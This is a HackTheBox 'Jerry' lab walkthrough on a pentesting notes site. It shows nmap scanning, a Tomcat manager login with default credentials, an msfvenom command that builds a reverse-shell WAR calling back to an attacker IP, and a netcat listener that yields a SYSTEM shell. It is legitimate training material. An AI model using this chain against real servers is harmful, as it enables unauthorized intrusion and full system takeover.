📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Reconnaissance
  • Exploitation

Was this helpful?

  1. HackTheBox
  2. Easy Machines

Jerry Writeup

Without Metasploit

PreviousLame WriteupNextLegacy Writeup

Last updated 2 years ago

Was this helpful?

Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (-Pn)

nmap -Pn 10.10.10.95

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 8080

  • (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 8080 -oN nmap 10.10.10.95

Lets go visit the web server this machine is hosting on port 8080.

Looking at the site and testing around tells us that Apache Tomcat/7.0.88 is running on it and we need a set of credentials to login as manger to perform other actions.

What we can do now is to go to google and search for default credentials that might work and let us login into the server. Also we can see a username and a password on the error page we get when we try to access the manager app with wrong credentials

Lets try logging in with these credentials

And we are logged in! Now looking at the application we can see that we have an option to upload and execute WAR files, this is something that we can generate using msfvenom and try getting a reverse shell on the server.

Exploitation

First we have to generate the msfvenom war file calling it reverse.war. I'm using my machines IP for LHOST (Listening Host), make sure to add your IP to the command.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f war > reverse.war

Now lets upload the file

After clicking deploy we can see that it has been added as a path under the Applications tab

After clicking the link (/reverse) we will get a reverse shell, so we first have to start a Netcat listener on our machine.

nc -lvnp 1234

Once we click the link, we get the reverse shell and as nt authority\system